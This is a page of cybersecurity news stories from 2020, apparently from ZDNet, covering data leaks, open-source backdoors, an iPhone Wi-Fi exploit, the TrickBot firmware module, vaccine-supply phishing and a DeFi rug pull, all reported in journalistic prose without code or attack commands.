More stories

  • in

    Data of 243 million Brazilians exposed online via website source code

    Image: Mateus Campos Felipe
    The personal information of more than 243 million Brazilians, including alive and deceased, has been exposed online after web developers left the password for a crucial government database inside the source code of an official Brazilian Ministry of Health’s website for at least six months.

    The security snafu was discovered by reporters from Brazilian newspaper Estadao, the same newspaper that last week discovered that a Sao Paolo hospital leaked personal and health information for more than 16 million Brazilian COVID-19 patients after an employee uploaded a spreadsheet with usernames, passwords, and access keys to sensitive government systems on GitHub.
    Estadao reporters said they were inspired by a report filed in June by Brazilian NGO Open Knowledge Brasil (OKBR), which, at the time, reported that a similar government website also left exposed login information for another government database in the site’s source code.
    Since a website’s source code can be accessed and reviewed by anyone pressing F12 inside their browser, Estadao reporters searched for similar issues in other government sites.
    They found a similar leak in the source code of e-SUS-Notifica, a web portal where Brazilian citizens can sign up and receive official government notifications about the COVID-19 pandemic.
    Reporters said the site’s source code contained a username and password stored in Base64, an encoding format that can be easily decoded to obtain the initial username and password, with little to no effort.
    The login information allowed access to SUS (Sistema Único de Saúde), the official database of the Brazilian Ministry of Health, which stored information on all Brazilians who signed up for the country’s public-funded health care system, established in 1989.

    The database contained all the personal information a Brazilian provided to its government, from full names to home addresses, and from phone numbers to medical details.
    The credentials have now been removed from the site’s source code, but it remains unclear if anyone has accessed the system and pilfered data on Brazilian citizens.
    If unauthorized access would be discovered, this would be the largest security breach in the country’s history. More

  • in

    Open-source: Almost one in five bugs are planted for malicious purposes

    Microsoft-owned GitHub, the world’s largest platform for open-source software, has found that 17% of all vulnerabilities in software were planted for malicious purposes. 
    GitHub reported that almost a fifth of all software bugs were intentionally placed in code by malicious actors in its 2020 Octoverse report, released yesterday. 

    Open Source

    Proprietary software makers over the years have been regularly criticized for ‘security through obscurity’ or not making source code available for review by experts outside the company. Open source, on the other hand, is seen as a more transparent manner of development because, in theory, it can be vetted by anyone. 
    SEE: Security Awareness and Training policy (TechRepublic Premium)    
    But the reality is that it’s often not vetted due to a lack of funding and human resource constraints. 
    A good example of the potential impact of bugs in open source is Heartbleed, the bug in OpenSSL that a Google researcher revealed in 2014, which put a spotlight on how poorly funded many open-source software projects are. 
    Affecting a core piece of internet infrastructure, Heartbleed prompted Amazon, IBM, Intel, Microsoft, Cisco and VMware to pour cash into The Linux Foundation to form the Core Infrastructure Initiative (CII).

    For the past few years, GitHub has been investing heavily in tools to help open-source projects remediate security flaws via its Dependency Graph, a feature that works with its Security Alerts feature. 
    The security alerts service scans software dependencies (software libraries) used in open-source projects and automatically alerts project owners if it detects known vulnerabilities. The service supports projects written in Java, JavaScript, .NET, Python, Ruby and PHP. 
    GitHub’s 2020 Octoverse report fond that the most frequent use of open-source dependencies were JavaScript (94%), Ruby (90%), and .NET (90%). 
    While almost a fifth of vulnerabilities in open-source software were intentionally planted backdoors, GitHub highlights that most vulnerabilities were just plain old errors. 
    “These malicious vulnerabilities were generally in seldom-used packages, but triggered just 0.2% of alerts. While malicious attacks are more likely to get attention in security circles, most vulnerabilities are caused by mistakes,” GitHub notes. 
    As ZDNet’s Charlie Osborne reported, vulnerabilities in open-source projects remain undetected for four years on average before they’re revealed to the public. Then it takes about a month to issue a patch, according to GitHub. In other words, there’s still room for improvement despite GitHub’s efforts to automate bug fixing in open-source projects. 
    GitHub notes in its report that the “the vast majority” of the intentional backdoors come from the npm ecosystem. ZDNet’s Catalin Cimpanu reported this week that the npm security team had to remove a malicious JavaScript library from the npm website that contained malware for opening backdoors on programmers’ computers. Using this venue to distribute malware to developers makes sense given that JavaScript is the most popular programming language on GitHub.
    SEE: Google: Here’s how much we give to open source through our GitHub activity
    GitHub notes that only 0.2% of its security alerts were related to explicitly malicious activity.
    “A big part of the challenge of maintaining trust in open source is assuring downstream consumers of code integrity and contitinuity in an ecosystem where volunteer commit access is the norm,” GitHub explains. 
    “This requires better understanding of a project’s contribution graph, consistent peer review, commit and release signing, and enforced account security through multi-factor authentiticatition (MFA).” 
    GibHub notes that flaws can include ‘backdoors’, which are software vulnerabilities that are intentionally planted in software to facilitate exploitation, and ‘bugdoors’, which are a specific type of backdoor that disguise themselves as conveniently exploitable yet hard-to-spot bugs, as opposed to introducing explicitly malicious behavior.
    The most blatant indicator of a backdoor is an attacker gaining commit access to a package’s source-code repository, usually via an account hijack, such as 2018’s ESLint attack, which used a compromised package to steal a user’s credentials for the npm package registry, GitHub said.The last line of defense against these backdoor attempts is careful peer review in the development pipeline, especially of changes from new committers. Many mature projects have this careful peer review in place. Attackers are aware of that, so they often attempt to subvert the software outside of version control at its distribution points or by tricking people into grabbing malicious versions of the code through, for example, typosquatting a package name.  More

  • in

    Google researcher: I made this 'magic' iPhone Wi-Fi hack in my bedroom, imagine what others could do

    A Google Project Zero (GPZ) bug hunter who specializes in iPhone security has revealed a nasty bug in iOS that allowed an attacker within Wi-Fi range to gain “complete control” of an Apple phone. 
    GPZ is a security research group in Google tasked with finding vulnerabilities in all popular software spanning Microsoft’s Windows 10 to Google Chrome and Android as well as Apple’s iOS and macOS.  

    Ian Beer, a GPZ hacker who specializes in iOS hacks, says the vulnerability he found during the first COVID-19 lockdown this year allowed an attacker within Wi-Fi range to view all an iPhone’s photos and emails, and copy all private messages from Messages, WhatsApp, Signal and so on in real time. 
    SEE: Managing and troubleshooting Android devices checklist (TechRepublic Premium)
    “For 6 months of 2020, while locked down in the corner of my bedroom surrounded by my lovely, screaming children, I’ve been working on a magic spell of my own…a wormable radio-proximity exploit which allows me to gain complete control over any iPhone in my vicinity,” he writes.
    Apple fixed the bug ahead the the launch of Privacy-Preserving Contact Tracing, which arrived in iOS 13.5 in May. 
    Beer, who regularly finds critical flaws in iOS and macOS, is using his bug to stress to iPhone owners that they may have a false sense of security when it comes to thinking about adversaries. 

    “The takeaway from this project should not be: no one will spend six months of their life just to hack my phone, I’m fine,” notes Beer. 
    “Instead, it should be: one person, working alone in their bedroom, was able to build a capability which would allow them to seriously compromise iPhone users they’d come into close contact with.”
    The contact-tracing connection Beer highlights is important because the bug he found was in an iOS feature called AWDL or Apple Wireless Direct Link – a proprietary Apple peer-to-peer networking protocol used for features like Apple AirPlay and the iOS-to-macOS file-sharing feature AirDrop. 
    AWDL is used in all Apple iOS and macOS devices. Researchers last year found serious flaws in the protocol that allowed an attacker on a network to intercept and change files being sent over AirDrop. The most concerning part of that batch of AWDL flaws was that they allowed an attacker to track an iPhone user’s location with a high degree of accuracy. Apple fixed those AWDL bugs last May in iOS 12.3, tvOS 12.3, watchOS 5.2.1, and macOS 10.14.5.
    The details of the flaw itself are important, but Beer is using his exploit to make a bigger point about the economics of software exploits. 
    As Beer notes, there are professional exploit brokers that sell iOS exploits to governments. 
    “Unpatched vulnerabilities aren’t like physical territory, occupied by only one side. Everyone can exploit an unpatched vulnerability,” notes Beer. 
    “It’s important to emphasize … that the teams and companies supplying the global trade in cyberweapons like this one aren’t typically just individuals working alone,” he continues. 
    “They’re well-resourced and focused teams of collaborating experts, each with their own specialization. They aren’t starting with absolutely no clue how bluetooth or wifi work. They also potentially have access to information and hardware I simply don’t have, like development devices, special cables, leaked source code, symbols files and so on.”
    SEE: 10 tech predictions that could mean huge changes ahead
    The AWDL bug itself was due to the common category of memory security flaws, which Beer describes as a “fairly trivial buffer overflow” due to programming errors Apple developers made in in C++ code in Apple’s XNU (X is Not Unix) kernel. Microsoft and Google have found that memory vulnerabilities make up the vast majority of flaws in software. 
    In this case, Beer didn’t need a series of vulnerabilities in iOS to take control of a vulnerable iPhone, unlike the three iOS bugs Apple patched in iOS 14.2 last month. In other words, the one Beer found is highly valuable because of its relative simplicity to use. 
    “This entire exploit uses just a single memory corruption vulnerability to compromise the flagship iPhone 11 Pro device. With just this one issue I was able to defeat all the mitigations in order to remotely gain native code execution and kernel memory read and write,” he writes.  More

  • in

    Google Authenticator for iOS gets a much-needed feature

    I dumped Google Authenticator a while ago. Sure, it’s the granddaddy of two-factor authentication apps, but it’s old and has some severe downsides.
    The biggest downside being that you couldn’t transfer accounts between devices. It was a case of blitz everything and start again. I’ve come across a lot of people who entered the tarpits when this happened.
    But finally, as 2020 draws to a close, this feature comes to iOS and iPadOS.
    Must read: Paying money to make Google Chrome faster and use less RAM
    Earlier this year, Google Authenticator for Android received a revamp which saw it getting dark mode and the ability to transfer accounts between devices. It works pretty well, but wasn’t much use to you if you were an iOS user.

    The newly-released version 3.1.0 is the first refresh the iOS app has had in over two years, and adds the following:
    –       Added the ability to transfer accounts to a different device, e.g. when switching phones

    –       Refreshed the look and feel of the app
    –       Dark Mode support
    Personally, I moved over to Authy and have had no problems. This app is more feature-rich, and also works on Windows, Mac, and even Linux (along with, of course, iOS and Android). However, for those still using Google Authenticator on iPhones and iPads, this will be a welcomed update. More

  • in

    8% of all Google Play apps vulnerable to old security bug

    Image: Check Point
    Around 8% of Android apps available on the official Google Play Store are vulnerable to a security flaw in a popular Android library, according to a scan performed this fall by security firm Check Point.
    The security flaw resides in older versions of Play Core, a Java library provided by Google that developers can embed inside their apps to interact with the official Play Store portal.
    The Play Core library is very popular as it can be used by app developers to download and install updates hosted on the Play Store, modules, language packs, or even other apps.
    Earlier this year, security researchers from Oversecured discovered a major vulnerability (CVE-2020-8913) in the Play Core library that a malicious app installed on a user’s device could have abused to inject rogue code inside other apps and steal sensitive data — such as passwords, photos, 2FA codes, and more.
    A demo of such an attack is available below:
    [embedded content]
    Google patched the bug in Play Core 1.7.2, released in March, but according to new findings published today by Check Point, not all developers have updated the Play Core library that ships with their apps, leaving their users exposed to easy data pilfering attacks from rogue apps installed on their devices.
    According to a scan performed by Check Point in September, six months after a Play Core patch was made available, 13% of all the Play Store apps were still using this library, but only 5% were using an updated (safe) version, with the rest leaving users exposed to attacks.

    Apps that did their duty to users and updated the library included Facebook, Instagram, Snapchat, WhatsApp, and Chrome; however, many other apps did not.
    Among the apps with the largest userbases that failed to update, Check Point listed the likes of Microsoft Edge, Grindr, OKCupid, Cisco Teams, Viber, and Booking.com.

    Image: Check Point
    Check Point researchers Aviran Hazum and Jonathan Shimonovich said they notified all the apps they found vulnerable to attacks via CVE-2020-8913, but, three months later, only Viber and Booking.com bothered to patch their apps after their notification.
    “As our demo video shows, this vulnerability is extremely easy to exploit,” the two researchers said.
    “All you need to do is to create a ‘hello world’ application that calls the exported intent in the vulnerable app to push a file into the verified files folder with the file-traversal path. Then sit back and watch the magic happen.”
    This research shows, once again, that while users may be using an up-to-date version of their apps, that doesn’t necessarily mean all of an app’s inner components are up-to-date as well, with software supply chains often being in complete disarray, even at some of the world’s biggest software/tech firms. More

  • in

    Mysterious phishing campaign targets organizations in COVID-19 vaccine cold chain

    IBM’s cyber-security division says that hackers are targeting companies associated with the storage and transportation of COVID-19 vaccines using temperature-controlled environments — also known as the COVID-19 vaccine cold chain.

    The attacks consisted of spear-phishing emails seeking to collect credentials for a target’s internal email and applications.
    While IBM X-Force analysts weren’t able to link the attacks to a particular threat actor, they said the phishing campaign showed the typical “hallmarks of nation-state tradecraft.”
    Government agencies and private companies targeted alike
    Targets of the attacks included a wide variety of companies, sectors, and government organizations. This included the European Commission’s Directorate-General for Taxation and Customs Union, an organization that monitors the movement of products across borders — including medical supplies.
    The attackers also targeted a company that manufactures solar panels used for solar-powered vaccine transport refrigerators and a petrochemical company that manufactures dry ice, also used for vaccine transportation.
    Further, the same threat actor also targeted a German IT company that makes websites for “pharmaceutical manufacturers, container transport, biotechnology and manufacturers of electrical components enabling sea, land and air navigation and communications.”
    Also: MIT machine learning models find gaps in coverage by Moderna, Pfizer, other Warp Speed COVID-19 vaccines 

    According to IBM, the attackers specifically targeted select executives at each company, usually individuals working in sales, procurement, IT, and finance positions, which were likely to be involved in company efforts to support a vaccine cold chain.
    The selected targets typically received emails using the spoofed identity of a business executive from Haier Biomedical, a Chinese company which is part of the UN’s official Cold Chain Equipment Optimization Platform (CCEOP) program.
    “The subject of the phishing emails posed as requests for quotations (RFQ) related to the CCEOP program,” IBM researchers Melissa Frydrych and ClaireZaboeva said in a report today.

    Image: IBM
    The emails contained malicious HTML files as attachments that victims had to download and open locally. Once opened, the files prompted victims to enter various credentials to view the file.
    “This phishing technique helps attackers avoid setting up phishing pages online that can be discovered and taken down by security research teams and law enforcement.” 
    All in all, companies in Germany, Italy, South Korea, Czech Republic, greater Europe, and Taiwan were targeted in this campaign.
    COVID-19 companies repeatedly targeted in recent months 
    But this phishing operation is just the latest in a long list of different attacks by different threat actors that targeted the COVID-19 vaccine research field this year.
    Previous targets included Johnson & Johnson, Novavax, Genexine, Shin Poong Pharmaceutical, Celltrion, according to the Wall Street Journal, and AstraZeneca and Gilead, according to Reuters.
    Some of the attacks have been linked back to the governments of China, Iran, Russia, and North Korea.
    However, while the previous attacks targeted the vaccine makers directly, this particular campaign was different because it targeted their supply chain — suggesting threat actors are also looking for information on how to transport and store vaccines, and not only how to make it.
    The US Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency are scheduled to release a security alert later today about the phishing campaign spotted by IBM.
    The joint FBI and CISA alert comes after Interpol published a different security alert on Wednesday to warn that organized crime syndicates, active both in the real world and online, are most likely to infiltrate and disrupt vaccine supply chains for their own financial profits.
    Several pharmaceutical companies have announced this fall that they’ve developed successful COVID-19 vaccines, most of which are expected to enter broad distribution in early 2021 — if their supply chains don’t get disrupted. More

  • in

    New TrickBot version can tamper with UEFI/BIOS firmware

    The operators of the TrickBot malware botnet have added a new capability that can allow them to interact with an infected computer’s BIOS or UEFI firmware.

    The new capability was spotted inside part of a new TrickBot module, first seen in the wild at the end of October, security firms Advanced Intelligence and Eclypsium said in a joint report published today.
    The new module has security researchers worried as its features would allow the TrickBot malware to establish more persistent footholds on infected systems, footholds that could allow the malware to survive OS reinstalls.
    In addition, AdvIntel and Eclypsium say the new module’s features could be used for more than just better persistence, such as:
    Remotely bricking a device at the firmware level via a typical malware remote connection.
    Bypassing security controls such as BitLocker, ELAM, Windows 10 Virtual Secure Mode, Credential Guard, endpoint protection controls like A/V, EDR, etc.
    Setting up a follow-on attack that targets Intel CSME vulnerabilities, some of which require SPI flash access.
    Reversing ACM or microcode updates that patched CPU vulnerabilities like Spectre, MDS, etc.
    But the good news is that “thus far, the TrickBot module is only checking the SPI controller to check if BIOS write protection is enabled or not, and has not been seen modifying the firmware itself,” according to AdvIntel and Eclypsium.
    “However, the malware already contains code to read, write, and erase firmware,” the two companies added.
    Researchers say that even if the feature has not been deployed to its full extent just yet, the fact that the code is present inside TrickBot suggests its creators plan to use it in certain scenarios.

    Appropriate cases may include the networks of larger corporations where the TrickBot gang may not want to lose access and may want to leave behind a more powerful boot-level persistence mechanism.
    This module could also be used in ransomware attacks, in which the TrickBot gang is often involved by renting access to its network of bots to ransomware crews.

    Image: AdvIntel
    If companies who had their networks encrypted refuse to pay, the TrickBot module could be used to destroy their systems, AdvIntel and Eclypsium said.
    Or the module could also be used to prevent incident responders from finding crucial forensic evidence by crippling a system’s ability to boot-up.
    “The possibilities are almost limitless,” AdvIntel and Eclypsium said, highlighting TrickBot’s many different areas where it also helps its customers operate.

    Image: AdvIntel
    Feature powered via publicly available code
    But the addition of this feature to the TrickBot code also marks the first time that UEFI/BIOS tampering capabilities are seen in common financially-motivated malware botnets.
    Prior to today’s report, the only malware strains known to have the ability to tamper with UEFI or BIOS firmware were LoJax or MosaicRegressor.
    Both are malware strains developed by government-sponsored hacking groups — LoJax by Russian hackers and MosaicRegressor by Chinese hackers.
    But according to Eclypsium, a company specializing in firmware security, the TrickBot gang didn’t develop its code from scratch. Its analysis suggests the gang has instead adapted publicly available code into a specialized module they could install on infected systems via the first-stage TrickBot loader.
    “Specifically, TrickBot uses the RwDrv.sys driver from the popular RWEverything tool in order to interact with the SPI controller to check if the BIOS control register is unlocked and the contents of the BIOS region can be modified,” Eclypsium said.
    “RWEverything (read-write everything) is a powerful tool that can allow an attacker to write to the firmware on virtually any device component, including the SPI controller that governs the system UEFI/BIOS,” Eclypsium said. “This can allow an attacker to write malicious code to the system firmware, ensuring that attacker code executes before the operating system while also hiding the code outside of the system drives.”
    New feature added after failed takedown attempt
    But the timing in the discovery of this new TrickBot feature is also something to take note of. It comes as TrickBot is slowly coming back to life after a failed takedown attempt.
    Over the past few weeks, TrickBot operations have seen a flurry of updates, from new obfuscation techniques, new command-and-control infrastructure, and new spam campaigns.

    All of these updates are aimed at reviving and shoring up one of today’s largest cybercrime-as-a-service botnet operations, which in its heyday, was controlling more than 40,000 infected computers each day.
    Sherrod DeGrippo, Senior Director for Threat Research and Detection at Proofpoint, told ZDNet that Proofpoint “has not observed a significant change in the Trick volumes despite the disruptive activities by US Cyber Command and the Microsoft-led coalition.”
    For now, TrickBot doesn’t only appear to have survived the takedown attempt, but is actually coming back to life with stronger features than before.
    “Every actor responds to changes in their operational environment differently,” DeGrippo added.
    “[TrickBot] has demonstrated that its botnet is resilient to disruptive actions by governments and security vendors; however, it is not immune to future disruption. We anticipate a higher velocity of infrastructure changes and malware updates to occur in the near term.” More

  • in

    Compounder Finance DeFi project allegedly pulls the rug from under investors, $11 million stolen

    An exit scam allegedly performed by Compounder Finance DeFi developers has left investors $11 million out of pocket. 

    Compounder Finance called itself a “smarter farming” platform and a Harvest/Yearn Finance clone, as first reported by CoinDesk. 
    At the time of writing, the project’s website, Twitter, Medium, and Discord pages appear to have been deleted. 
    According to a cached version of a Medium blog post describing the project, dated November 8, Compounder Finance claimed to be an automated farming system offering compound interest on digital assets while also earning native CP3R tokens as a “reward.”
    See also: Chainalysis launches program to manage cryptocurrency seized by law enforcement
    “We will examine yields, security and complexity of new pools that will keep our stakers comfortable knowing they have a competitive edge to other farmers. We hope to offer the next generation of high-interest returns,” the developers claimed. 
    Pools supported ETH, DAI, USDT, and USDC.

    Compounder Finance, having only launched last month, promised investors that the Ethereum-based decentralized finance (DeFi) project implemented 24-hour time locks on all smart contracts imposed in the interest of safety, but what wasn’t known is that the developers allegedly included a hidden backdoor into the system. 
    In a ‘rug-pull,’ otherwise known as the unexpected removal of liquidity from a token, once the platform had secured enough funding from eager investors, roughly $10.8 million in wrapped Bitcoin (WBTC), ETH, DAI, and other tokens was transferred out of the project. 
    DefiYield, a Twitter user that claims to have lost $1 million in investment due to the rug pull, has offered a $100,000 reward for any information leading to the identity of the threat actor, or any means to return stolen funds to victims. 
    “As this is a substantial loss for me and many more crypto farmers, I will keep going on with the investigation and pushing the authorities now and in the coming years, until there will be a positive result,” the investor said. 
    CNET: Google researcher demonstrates iPhone exploit with Wi-Fi takeover
    A Telegram group has also been created for impacted investors to explore their legal options.
    Solidity Finance previously audited the project (.PDF) for external threat potential and flagged the suspicious time-locked smart contract setup, as well as the control maintained by the central development team. 
    Malicious strategy contracts were added after the audit, allowing the rug pull deployer to withdraw funds. 
    TechRepublic: Sales of CEO email accounts may give cyber criminals access to the “crown jewels” of a company
    Together with @vasa_develop from Stake Capital, a post-mortem report on the rug pull has now been published.
    “The Compounder team swapped the safe/audited Strategy contracts and replaced them with malicious ‘Evil Strategy’ contracts that allowed them to steal user funds,” Solidity Finance said. “They did this through a public, though clearly unmonitored, 24-hour timelock. The team had the power to update strategy pools and they did so maliciously here.”
    At the time of writing, the CP3R token is worth $0.34, down from $80.18 on November 25.
    Previous and related coverage
    Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More